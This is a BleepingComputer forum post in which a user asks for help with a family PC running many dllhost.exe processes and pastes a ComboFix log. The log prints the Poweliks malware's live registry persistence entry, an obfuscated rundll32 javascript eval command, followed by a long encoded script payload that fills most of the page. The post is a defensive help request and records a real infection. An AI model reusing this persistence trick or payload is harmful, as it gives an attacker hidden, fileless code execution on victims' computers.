Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Another dllhost.exe running amuck


  • This topic is locked This topic is locked
15 replies to this topic

#1 mpl006

mpl006

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 14 September 2014 - 06:29 PM

My mom and step-dad's computer has been acting up recently and they wanted me to come take a look at it.  They live about 2 hours away so I went down Friday the 12th and worked on it for a total of about 18 hours.  At first I was in safe mode and ran spybot s&d, avg anti-virus, and malwarebytes to no avail.  It didn't take long for me to figure out that if I disconnected from the router, the computer worked ok.  Launched Task Manager and noticed all the instances of dllhost.exe when I plugged back in.

 

I found a few threads on here and that kind of matched what was happening and ran ComboFix and after that was done, I could plug in and it "worked."  I saw that because I could plug into the network and the computer wouldn't bog down.  Before I left, I restarted to make sure it was really fixed and the issue came back.  I started ComboFix again so that I could get the computer connected to the internet so I could remote in and try and help long distance.  I will post the log from ComboFix in a post below.

 

Thanks so much for your help!

 

Michael


ComboFix 14-09-12.01 - Dale 09/13/2014  18:39:24.2.2 - x86
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.1022.374 [GMT -5:00]
Running from: c:\users\Dale\Desktop\ComboFix.exe
AV: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Spybot - Search and Destroy *Disabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         #@~^7H0AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7  !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crJbi)clc2U-bDWUhxO`rKMW^/kJ#*`rCJ*'Ek6~c]K+XORAxmK[rxTT=))?/(&R!+DjYMkULv$ZGU7+.YYl=s.K:~l/vWjYMkUovB[ux*+ytF(:1ZC ,!qVNV+q$4mhsD(Z44i!wX5 q^N!.HFwA-1 ^!lq,!KKz/PwEt!w!42B*h?I`^U.^|j!Lq]lm!.(p.ZoBo~tmhoD}pI^^ HdqF~tmssDt("V^k4p8fgwNVs\(L!XF#!T8IXm!#9q/IUt("F^hlj+p$^n#Yq8yVVo?0G9wIl^MjZ[^/t!jXnjOA1CAA8+F4lq*[r%2GNp9Htl!]!OY5 s!SVI^tsV;\j"*4ssDCgA^&gV8 x/+ULW::.2Ji,bls.%N/$:+p1ZtZEihj:4!#NN!V78b*$1&gV4q9knjlt8`W(sxV}saVI&I^t3I^4V.U5p]^qr3aJsDKnpg!} T!jh.s8V.%9M^\4b*w8^!J3wy^+jY5sa*5x.a8!I^m0s%5+#.mq!+6VxF8r0EI!#sl *^]_V;I8w5ZF7tCj/t?Tkj l1}qq\1xVg8+I84VjrS/]s5 6.t?0E]!j:l X^.uVStUor9Z&/q01ke(gyJs~FehXw5HaK\skt pkpq*"liHk5p1.J2wF[!Of4!o.mzqk 81X1&"V4U*g[X!Cgt^f"2}qaV\ sZt#!arHIi+p$^pU.a8M"V^rl2} ta4h.G8y*"9CxF52I7^kTkiV"K^!jLlqo/::sDtj6&lqIspUs:l mkiCjk8!^Lqra(jfV.[V.OdVxV}s6^e&"w8 WE}+w/4VsE\!178U}^4 I24+X.(PW+i&"t8h"tmh}k9oA4^ssO\("Vm HaJVgV[2^Y^!XV4q#E9MsZC ,!Is64}f\Kqs988x"w8 `/K o!5 N^t;q2}X"j+oA^}xjw8M"V^rl2}qtw(:.gtpIK4ypGqVs!Nh,Mt?&/(s~F5haa5z6&CqIs5x^KlqmkP:j&i X\[/XloB!9sk(rh0js.TNpB!.uVSt?S3i!wX5 q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms ^zobj .;N!sD}j6geltt+j3qrVFmh.Z[o9;&Z"j+oA^}xjw8M"V^rlfms#t9M.`npA^|;3{0 t84h1ZCOE(!9t+q$4mhsD(;t8`MwX5qF^[MjXFs~\^+^!lq1EhKbkP s!}VsT4fBlnjI`^xjVF#ZoqHZmhV!t8!Lx28\}_.kt?X4iMwXe 8VNV#XnsA7^+VZlq,;nP3kK s!tMw!8fx*nj]`mU.^Fj!LqFg!msV!tFZoBs~X8+gV}_#X\?3FBo1lm2Is4io.m+.De:X*K#DAmu$A4+F4Cq*[}LafNo9Htl!]MOYe ^ES0[V92s.^+.D5s62}p\K|p6oCMjXtj8n5h2^5fIFBw%;" X\5ssk}(gyt8k8u^f5qHW\?bD} *0q;IWSVa75+sZCOEJsgh4!sZ|/91p;q2qXZ6(U*w^(jt8CtW(sg*m2]V(?*08!hb|o!{9o#!m+sstjlt[!^ }iq^N!t7t_H1xsg*m2I^8jwy^ jYehX*S0[V9sIl^!jKq0F25fB7m+,s[Zl(C WyHrXj4U14ts.6I("wNs.gt("W8 "y(r0Gms#!9(9!(/Ij4 14}h#}5pIa[:j1tp"W4+].SVN^[AFs9M4\};ob] j!iCx\eTw3}_BV1&HbFj*x4 }-l+iK9!*88MS/}/44jfs.N!.DJ^9q(x"w4qj!jl!t(x\^ogVm twI ..JVt44sId}#B^}s!KP:j&JiOklh#NN/A:no1T\ZEj .![M^Yt?l98U"Vms1h` .H[hVN}oH;?!o!}!6^i:j:F/4r}p^DK+9$tq1T&2^ENwAZ^k0/BsjE^+w:}`Xt9MVytiF^NVt-}u\!I+.ZPj!C!O3|/B_}pIg8yIq(Mjq5q*08M`kF?l98U\\lyiWxM*88!hkp;oVK 10N 6^F?0wFjS3juB75+.0[o9sn?0G0jY;n("V F8N(/"hnjOf( *ytp9Z(:WIUB74i94^ ` Hog!mhs!}zob#^V+1 1D+V,48("}e88 ^..8s("&Al h,kIsFdluob4 sniVac wY.hqa.#N^#ZNA1Fa\4A}7]:46PKxtjsxt?^stm3wDC#.ol8Nu4f#m4+6V^MXW^#aC5i2U5 t\eqF*(^..2so] w|i:wc8 ^..2#lU!.2}is~pooA3oq4 6lt283]U4q.h4bIit&is1G1 xCrqwWCF41}j^!}i"MKZ]&5(ton9AIjjIur 4mK IV\jjc^o^EK34U}!tKey*d5x4DV1~P"M^!j38!"MIA4?IV9le%9}p oA."]mIq9l V9kjoxk+u2NrowV[sN9:C^M}`6G# w2t.g& "K.ZaLj21}#sw +b,XNUs$jsqMCXI#h82?s#shWH[2pXtjxD}`p7[&4*H:OpJT"qj:#n}MoXnh,Z.01BN3H5?pIw]j4w]oa:}To~r3Ytt`19:MgZ+`6o}FgHijxx]94xjVoAd&snt!.a?^ts+i2U}#1V[!AD] 9xpio~Kf1tC:soqKIc4`6It(^HtMjwPox:l`a2U15[uNUIVVjT[ HsoW}jwpj+^.H"$$.#t"}U,B1sx:jZ6Utx^H M\I]9x9mA#Z\22yiVq.jqI]4r1U}UVAt:\&phgf.t]s}un}twsku:"vpzw`tvgr#mxanu9f4a**u(i}6ivs5z9rpi]liuan]mxz\ixDpT}MpPVlHNI}g25y.`Ia s4&Jy~5H!0hG]ntstMe+,oK^9%psojN%Vq62^!\ig9N #"pV.~}`V("!xZI`s~]&~AejwA[TwAp`}y9LV+#iN7pU%XpT2U}hVV[!AD]i\xIio~?pIt#0V6(f^ApZhMi2OD]f93P3\9Hj#C`!s+n#N\181fU2g1uId}!^yniRc1PB~4f}hCV1dt2\}NGVGj("*]2^qj3xZI`oA5.b.CP17I`2-lU2Spj/.i&9kJqx:jT]2l m8#V}j(a}N_N5}.~&CK5 }iwAp`oxt&N;]3s;Hw1tHP4~jpVt]C9pj#j:r#eZ? 6VH`Ve5"fN`6I[Fw2 M\;^V4\mZ]WI!q8}s2MH2NKmT4aH9HZCVjIjiw/I/10}#p7#s}9U3A!jAI;jjZ&}j45t!0hG]x}M1jtfWWpqIrNia$m#s~}jwfjs"VpTa$mis~}`s9:fxfNV.}}.~9tyx5\3wnm.Bwt.t Pq}IHV1.TXqNhwUH:lIC a5lTsa.st2]GN%qsa\w10}(^ZHCIci3wAp`}h5jFU}#9XI_tfK/1`}VqXHjwM\P^Aj31aHT.wCV}Ct(1!NAV5j("1}!gW^iwC4Z(\tF.x}Pt$S.AsmTHgr39s MX jU9Wpio }pNx}js$5.\ s;] 9APjwA}p\xpjoA5j9oe NASZ}4pVo~pV1tH3^5[35!.3X~jis~#:s%L&6Ks%7[y4A}j\5Jf"fjq1A`js~Pp1GK;,tNV0W1Uq7]VgW}VwZpTt2pjYhCsNo5jw9m.3l]jwA]j9Wtqw&pjo\k,I6PVK4yIoKiowpU}b#:\:eu4dj o&pip7\:Ie5"2H`s4]&42}jxZi ^.jqOC`Z,IC!1;HA6BNsodH#sM]jXD]3wIpiohri5H}q,+`:0yjqYwjKAcj3xKPu^ KyOcmFsj]VsGI_N$.zO~pVs~}jOy}TZcpTt2pjYwjqNo5jwC4Zt4jM42}jxZ#rOc.sHI`js"CpWSm8s]p#o rosgCMgZ\ijpUo:.+V~ioN$`?R&jqYd}jjA}.z\ !wZpytA531}iV1"j.}roelIis~]j^5}i5!.!#~pis~P:t/59vH`VZt!jI]f\rip"xIjoL\FN$#V6\p0.u4Ts4KptA}jxZ#rOc.hH"jis"t.t]:4LpNsUH DI8x9Ai 0cIZX.5jNn#V1"jqVGpVoKKVWXFFg!]iaZph0HIiF~]`}!(Fwsj`sw}.9X}jwA}#jCl`q?5js"#h6ISZ}pl3B~pV1An2xc^iwMpse71qsMjZso5jwpS8t4t!l\n2jI}ijM;1Mjxt;}i9GI_t$+it2?o}It&K6jp"xI#oAHTVdn_N q("xIjs~ijwA}jDs# OApj3\g!s~]is~pqsHl3#~pV9o#:Ic#hwsIiow?#Aw]`I}IV`6p^57HFwDj!ws}iwpS84\`V1 }i9;.;%fpiowpis~}VwIiVwAps371qsMjZso5jwpS8tKtCgpCsjjFzR\rq1AUjs~}i}}.b,*.+H"pis" fw Jf"fj##~jis~J2t#`.wIpjsICV~A s^q]igAI`oA:jVw}i}oKGNBj!dM?it.^jws}iwMs4$.#sMj`}/(!wx?`s~if4jjjs}ijC4Z[t\!}X}p5W.0*oIiow?p}2tXR&JT5!jTH~pis~P:t9::\fjjsxhxjx^kx\}q9C48ol( 6wjV9"+ N!r qa.#sM]XVPsxfj##jIh9&i01]\ \&p`s~tL4]3js}ij9Ao3j.w7Jz%7Sy5a5r1VjUt;}jxf]U9q.PB$.#sM]A}9:Vxfjj.j]:w|t3gI jOc.qOI`js"C!1;H`ttN3#npVYtnj8q^3gA|"Bl5Tt }ZNt"C^C5`wAi.gV}jxfPu4FmZO9Ltq]i.wp`.Bj3V7HPV^C?Dtu1X4To4}Tp7tA1]:?Oc.oN"ijwItXO;J+"nHjot" N0}i9A429}/07Hip7]V^c}iwZIu(H.sN}e01P:9V+ N~}jwA#Kwl !wYNwst(.}DC#.oKjNumusm4+6VC:XW^ xY5i2UV9\eqF (^..81o]&~y :O/]hXMl_o1t:sniswmqs5?hqa.#N\#!9\[#a\43tD4!tX 0N4UVxl+wVg6("YC.j(t wY+wsl( 6V8TN4?^94?hqa.#}N[j5D\VwAI34U.#9geN9!m&Th.0V`] Xwe&g3]s"CI sVj.}Dn9Aqjq.oITsI.V6&iV"?joa5jsoWHojZey!XmVwL}A}5]FxDe 88pTh.0oLt!,x o.t?w9jl3]bH!68nf~.e+w5jU$\5+IVj`N*1MjY.ZVIiF"qi:"?]!&hK sctst\ sNVHww%}3e.I 68eygjjoxVph4b4i*kC`5"m&Th.q,U M4ht283]VXMjs1L(.}Dn9AjN8VpjTsI.36&i:jW#!j5KVBWHot.e0N*9V0c}A5W]3Whe 8/8pThG$k(.x !}b?w9 jUtbIq.+nf~ i8w1 ObK IVFZmX1Fa(?AtUtxT6t2"1npTh.`oH(.9.eVVK}A9H}3tGI".kt242joxI+uH0HhhynGA#`jXYj 1bj43]383]UwZ1Aqn1V9DC#.om2oA.f#M. 2HCL9wj99&piom4+6V[0NPm28Ap`s~P"M^&tX} jD.sqctsmH\hN&?w9rl!X+}Uw+nf~(FT\s4i].K IV[2I.Uy^rHqFW\s4C}3XFPowA+`]&5(Vt63V.H^w-KrOtphoXPf"!FT89HiX$? 60eZ1+g0hHoN~6M8r]3"Yjq\Z.Zq1(ss}CsAbp.H".iG7Ho}2tyt6[T"qK!s H"s2]At]}jR\pNsWj(56^2^!]q~9NA#1UMNAn!,Z1AwBN3sx?pI"j2^!}i9Aj/O~r9IA\q,d}(a2j;,a#Kx9C.\(] ^5Hq1wj.} P"tgjVt-.io~piIH]MO!\V9949oSKf}GC:sp"0hH0Va\s41]f9L] j9mZqFq(HWt+N5KyV#HpH$.#}w}?R!^ox(+i2I31ti^t9:s\(NZpSj(~s}VjIHsxZ.0#3`c7istGIV}ep#$NN#NAtV4Ai!"IKT2s.q1n#wNX:V"jjow2} Xre3^!Phx9mw#ZjssAniIS.`Iij%o;lT1AF!A*nPI!j9]AHq.ACjo"`0yHq,UHMS*ej"!6#^q?Zt.tj,}issKjU%a.hOari1tia*P!aZpTo~pis~C:I]`4Ap`s~}.~SC.\8TZ*? oM"k%.6pw5H^1B43t\Iu}A]f"tjiwApio$.i.gCj. 1 0h. 1a[!wvJ&9r]hw9mw#pjV2y]VIKH`9.}i}7NfAl6s^pJTgEjiq Ho}.]0.tg "(p 3HP&"}e?O}# 06jo4sU(1wP#s}.ss$KVt4? 60e3^yjP\v?Ta0.+Vn wt9:V"2I`1a\F\&]f1F\3l3jj$!m:/26P1j?H%A.U["icle!xMnP`!K%sNpV5S];%X":x9NA*bj(g1Cj" P!"Lm Bfq(IVeVV.IqN-43t\?PsV]!\Z#o`!HitqIVp7#^Nj`?R6wsaJ!gri:jWi#`6KZX?\:t"J"sql8.}r#eS? 6V 306]VDMI/105#p7#sI/jM^.A!76wri:gWi a...]." ,w#PpXI s!I/1q.T22[yg&^h0h3sa+V1tt^tX::4&poN~}jxIJywCqj9?A4A53s~}i}sS8}pjs37HqtxJyw}63RcK%4~Hh,X#Z}3dF\L+V}ICV~A#y"p]h"140HZ5j9qCjYWj^. Ks[qHUA~ejwA[TwApzO~IVs~}`}tkR6}b,0iaq}Vjw\Vw?p`XA5js~Jftqrws$p#oar m2\&1D] ^Ipio~?PsVFZ}/j wZ}Zs~i3xjJyg.j ^5H.4c9F}x[!Nwj`IUpio~j9tqtjjA}ij93o0Iq9I#Ns6jsI6}b,0iaq}Vjw\Vw?pj$A5js~JftqHws$p#oaST226Kg?]hw r#[WNq}x[VNo`jjAp`s~if4 2jA}ij9H`e\"39oJftj1ws$p#oK5T1ti:\c\3j\j9]d4s.}n_N U("xIjswijwA}jj:^VxtK0q!\!."#U5W.swopiowKf1tJ&4( #wAp#o7Hu3H}j99:CT6rq.o6Mlf}3wZ#h0D+`}&"s9`#h,ZH`1!}uo_I%VX] O joa\43e2IhtDCj.e9wxIZ*Ut(4ICVj}H3Z*NwowjLHSn9AIN.tojiowj9tqtjjs}ij9.3oA1o1W}js$5wx.^Vhi.\9[M9si g&.y2K:sV;]iVZI89B43e8?PsVHj\fPsxL+oo4p+,w}`s9:VxIlwsa fg1C.Iyi ^H8swjL1jC#5.5yV H+[a.%17J&4\owIp#ohr3F5C0NB53wAp s;8M1F}Vjw\Vw?p 2ZIj*x[!Nwjqw#9]jIh57tsw;JT\jpVo~pV1V[Z2."jaxI`s~] Oq#!"D]sgH`BsU2FV8"AaH0sjpTa5jft~}jxfPsx:+oojHi*X]y5Xt?DpS8tKe!wpCMj.}iwAp of":m8}s.aH0sjpU2;5i*x[M9si ^cHss"pis"J.VK"ZDq48AKe!wA}jwZ^ig}.#Zj3H}#9;+094KVsZ}T."e9?8Tw2pio~j93XJZN-5?Oc.yN"}jwIC?Of]%^x|Z#/5js~}iN7?8N3lTt:KoV;]j41]hRhlPB~jV1}is}*`?RyGtq8OlJyg5H/R*}`t&Us94e NZ`,].VsZ}T."e&9(CsgHiBwj9oHJ2t#U.wApjsat!5DnjAD\U9MI;1r9Ltq}V.~p`.BIP]~pTs~}j41^ wx+oshj#}x[VNo`g&.yw:Ps^Z].z*\ignlG}c`Z%7J"1j?q%zp"B~jVI7CxIyJzR!43elKf1&J.VKmV"H`9w] 9At!wA} wxp^^\sNNiis~j:}fSz0S|f1_J&4( #wAp#o7Hu3H}j93d ":lb,V (4A}jx2^Vt\rwtY"js~]iY}KoIUI#37Hq.xJ&4(P#wAp#3yNqN$#A6t53j9NA5l]L^V#y4E}T"Ap^](,weis~NZs$ph1;I9t~}j"p\s\ rot7Iis~]`V+qjR*1:AN8M"\}jws}iw9HN[Z53.~}ihZpq1$p#o8jis8}jw2nU~9HV];pVs~}`NG5("IIjsaJ&`DtC4\}ijHlZos5js~##AhlH,*.T#"jis"ty4IPiZ\5V4 NTs"}`s$".~&p`sIn:Shj3wc\3gk}.]!5j."#i}Am01O}TqUjis"ej"w\3w?I/1V.ut~}`9/jF\/^pyP!4*JXRDP949N0[5(C}G}VsGIGN/lo]q.swIejxZ]VwZppG7H }78U,(dXR64wwqF 4nJXR\J+wAlq#A539I#%s^?^99j [a.9sx[M9sijOc.Vo"pis"#jbXt2aZjZwU}FwDejgZ]VwZp^L " }WJz%MI_t/ph1XIi.~]j9w6owIp#37+oN7i`s$`.jprw}k]jwA]j^ iR*r:$M"sbH[h57SZs$pTaWmTt ]j\Z /R*KV[`ot+eqNKn!j|rAsw]:x\\3O:JzRX}Z#A`js~eiIUI0s/ps^7+oNxi.wAi 1cjiTyIoo.JH%.m3"|rAswj.z!J&1D]P9I?`oA"397PhV~p`.H5Tt:KoV;]jws}iwAI!1!K"H7J.Id"jafp:NW[XDs^&99}iw15ZtK:sV;]isxp`s$I!14NPm7Jy"5} "Zlj1~pVs~}`}V(!91p`sw] 1ciVwAijOc.0#I5js"HUtS4Zs/pio~I+N\[!wAi wq+3t~pVp7]^.j5jwZpH,~}3wA}jAD\TxIjy#A539oCpwqjs]p#ojI+3WiVwAip\:ro$~pi9q[ot2`jw?p^p76w2n2x?^iwC4Zo.dytq[3.~p`.!Kh1_Kis~]j9;tqxIp#oq.+N\P`so`R6+:9~i35\\Op]i\M}w]t5t_}i9ASZ}#jVo~pV97]!j}}ijMj/1V}ht~}`99"x9q.jsq\:9xi:9Ai#`\rwt"j.~]iV5I`I}rotMIis~]j\Z8TOHjiBwIV*7PA.t5jjM.s,_j!wA].z\#+wZlq[A5397#3.\p`.u4T3yj!9yJXRD]u4fjp22IV9"eqNF`wxIs%7[!j:}j9x OApj3\s}xiis~jqV#j OV?#bZJ&1D] gAIio~I+,~C^.fm!DMI s~# 4xi:9Ai#j15ZtK:sV;]isgp`s$I/1V.pt~}jx2J+"fj##a.#sMjwb*j:asp`swjjWcj3xx}i5!jq[A`js~#%9 5yY$I#ojr!1Vi!X}}VjAjio~pip7]^V/53wZpZIW}(4\]!DA}ijprwec"js~]i};.Vsul3[~pV9qejxW[Tw?I/0X4qAw]0}V(!9Zp`9w] 9}e!wsijOc.0#I5js"[Ut p`sjpzOIjTs~]jXD}ijApio$.#sM]8AKmFj9H:tn}:a\[ZDkJzR!Ao2gs1\}is~pqsHl3[~pVs+6Xkj3x.lPB~jVs:}`s$5K\AS257Jy^l#F9;}ia&lZ3\tFsMj#bW.^topiowIV97\3j}}ijM5 2`KoV;]`,59f9 SH, 6sw1PF"Pp"xIjo3`(w&}s.aH0sjp#]~pis~Hx9IJTwAppsh.32ZPjI]g!lv?:1gCxthP:axn#^;jo#}tLVZP3I H83z.hq\j".$eL&h^T8jl"otlVV8Pqw]9!X;5..t]Mk6PMa9n3lK1_4HmVj.Pfwwp`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~#w}A5jwAI`s~}jwf}jwA}jR\rAoA:MN~}is~p`s$pioG}Ts~}jwA}iwApi1&1+,h}`6]UxaKI.I~#(arj.\3^!x;Kos95y.w#3.2N`I]4+O"pis~}j\Z]VwApVq~jiV~^;Y}sj&p`s~}jwA}jwA}P"Ap`H99&1;}+N~p`NUpio~?pAa}9A}iwApqLS4iVG}`9$5jwApoN~}jwA}jwAiiwZp`oA5jsG}is~I0s$Iio~pis~}jw.}iwIpio~pis~}`,/mjwxp`1~}j"tC&9A}iwxp`oA`js~]is~p`.$pio~pis"}jwAiiwApio~pis~]`s$5jwAp`s~}jwA}jwA}iwrpssA1MNG}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}.~2i#^x?ss~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$piotl"s"#D#ojvIio2ITVG}`9$5jwApqF~}jwA}9A}iwAp`oA5js~}is~p`s$pi3Zpis~H2tFPsjM?VtjHiFl#qN#5jwAIws\t!^A}:9A}iwf}ZoA5js~}is~p`s$pio~pis~}jOA}iwnpio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5";?o.g#MDyjxw\83wAp^tAU(}.tzY2m8jas4~?ppl}!9\ #1X4+o~?p}A s,d"L^M}2w"is^1 j1*C"wlA#29!IqtiV"IVI +i#A139G}(92noT!I#H~NTs~ijs5}sws}89~}jwA^!4W] XMl0#2929\n322.^NojiX;V9\iK"L^ia;Ih2A131DiqN$5K~Ml`.~}jg\3j(to99}q]f"3s&8h6$?V* l34Am39\Cf`F i&\r t~.#sa}ZI+"!5!+0*~jjgf\28VtTx\j`[A5jF~}#A;SZ1fpiB~?i9l 29A iw;?h^l.%t&t8A/\x9I`I~P2j\t!SyCrO.p8st5jY}]i.Irw.o1s]oK I2Cs"}83xM1u2\p#b7]^N25.\/p`V`]M"Y V"5#VZXAtM:V`}#V~IwwFpiB K/,$#f~VC"^E|TtGlVFVP`sB"!A!H`}A}.xI#kRc#s49p2s(5.I~ii9N+VVJr#HW+3IdP3wlPpgM1u[Gl+1;8Z.t5wA._9GJy4Cs~xPq^f?0X95&AaPV5l}`FfI3oor!*G]2w2JTl(pUH5IT.$C:A]m!x9mZ1~if4&J&4]i9yp`qY5L}~ift~p0sBpf#~m3.;}j4AtV8HK"s_pzY ^VF3t.ThI.N;]3^962`c\q^qNZ3h":t\[T%7|H,fSTt~j9Ig#j^f]q~AKio"j#s toNo51cjjs J 9fts"L}VZ\5b1r`s.giiVwpqVo5U2Ir35S]j^rtTlflh[t+is![shqmsgprwVVisjI#2gA]3wvjVBA"j,}tuN_Ib%".T1~I%V^CK4reU^LKp2~KiIG}0s/`VjKZ6diL~Itj\f\iw(IVtV(1~}iV$KAwqI/1ZN+N~CF^y^Tw&1"];osVj`6.qjwcpZ*q}Fw.#9Z#+w2rAB29!9o#hNK.8.ij32}NV9~]Fw&["~Z+%o5HPAxC0Vh5("3lAI2}4\j!jAji^Zps115t sVjI2tK4T^7HqsMj3Xx}igIp [~?TFlPj.ajw?I_Ns\K~9 28V}sxW?G]5"jste#sn?2N9?itgS"t_ikDy}TZ\r![NI9I~}qVUU!R\1:sw] ^9]K\?83j/pqHD"y}UPV6A`F}"H~?3}gi3j|n3xV?ioa.r,2j_w5d!l.sN4t!\5e!A\J"A\rGo1t3s2#is5HAs]}9]~5ht^]!j\CTxI.TB\Io}$t w#IF^p?Z6n#2w9}xws]+g(.`tM5Vp7]h9 l0FGHi#\losxe!w&iTwIIf[~+Pt&6ApzUj"*?:1gj916MI\89w?|2[t:CoMjuwKlwsa}PBKm#}o#:SD}p99l anm+1~Cs6G1.jC1AF~jD*C XW^ x9j`qIUFkPU1gpq6d}+44lVVgt!^Y89jy?ioGmuA\eqF]:(9sl.A!82\}}!wZ^iwS?sO\I:YV}isA?w9rjs[43WS}j83]Ujq.h4bIit&}`.p}MxC+_}\6saMi(gA[qwMH0#/9FVA\Vs;.qs(?hamm+IV\!wZCoa1Ve.}T1ti`s$:.`!jAsA]:xqiVw2]#"Crq4l:IVnis;Kqsp?UsWHotg .w|n j.?3[U}392i`sAs\s5N1N8!w66(at]TDAmoHl"FqM} w.HZqzphHnpp.2Cj4*\ig|ph[}m!w&ty6!q2wXpjV;6jl}ns";nV5&pqVytMwK^9AK.0s%p 1"r#t&ejt\63"phXNIopZn V9(3"\}Zs0]Mk&nj45P+^&pNofU(I_i3VZI`F$p%] HsoZ}jwp]+^&p%]x?pI"jAVTqjaApZ6"}:92\9ptiw&I;OwjVt.C#5.4yVjjVe8?#.V}!^9nV\xNia~?3.\HNtO:s\V+`6~]Lg\CK~5H!^&+`4A5?/.}V.hKA}B?T]~IqoW}jwpP+^.H"$~?PsVnAs}j!D.GA~j("MJ!^!t9^AjwsAU(Aw}h1"1^9/HT#~?o.nJy~56!1yH"4wpPslHjsA`3WFp^V;i."n]V`XCTZcpo$j`jpSCPb.HVVdNTtSpisAnj"heT"tj%o;}T*~tH,U`MgFmZ3Z}Vwx6sz\iqj9jH1.tsshji}sjNojiam}sty#jw(J+^||qoxjTN}}`Wq:.wHrAN e xH]xgMjiA*1A3\t!*"C#.IrVsUpie7r .ni:\w}vjz+i4_ji9t#0v6(f^apzhm}j"v^2ad\qgcjZX5jsmjiI5?^w5N3a;}T9+PK"!jTg9mfshNTIhtVNJ:Ca\Aw0]jji(96P!gx+`BcgVVKPitGS2so5f[\IoV_}.z*]%^9j3HdI!6}}jAj(a}N_N5}.~&]j^FP+92K`Bxt&N;]3s pqIo4iXAK3pZPj^f}V4p.z1GSTsoiq9sjgpp0}gP3gM[kk 